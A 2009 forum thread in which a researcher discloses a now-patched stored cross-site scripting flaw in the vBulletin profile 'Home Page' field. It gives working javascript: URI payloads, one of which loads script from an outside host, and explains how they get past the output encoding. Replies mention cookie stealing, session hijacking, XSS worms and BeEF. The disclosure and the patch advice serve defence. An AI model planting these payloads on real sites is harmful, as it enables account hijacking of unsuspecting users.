» vBulletin 3.8.4 - Cross Site Script Redirection

[MaXe]

vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

References:
http://www.vbulletin.com/forum/showthread.php?t=319572


The Advisory

Quote:

The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to html entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes " .. The other
characters like < will become &lt; which is %3C which is almost the same.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.write('<script>alert(0)</script>')

The following scheme is a Proof of Concept that external Javascript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)

Solution
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1


Conclusion
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.


All of the best,
MaXe

[System]

O_O shweet find! lol

/pwn going around everywhere

[zero]

so ?
how to hack vbulletin?? :D

[Norph]

Read the post. The version of vBulleting is vulnerable to XSS.
Read up on XSS. ;)

[zero]

what we can do with XSS ?
just cookie stealer or else?

[ccoder]

cookie stealing and sesson hijacking are the most dangerous one !

but there are more ! like coding xss worm , or making ddos by persistance xss !

also there are some powerfull tools like BeEF .

google it ;)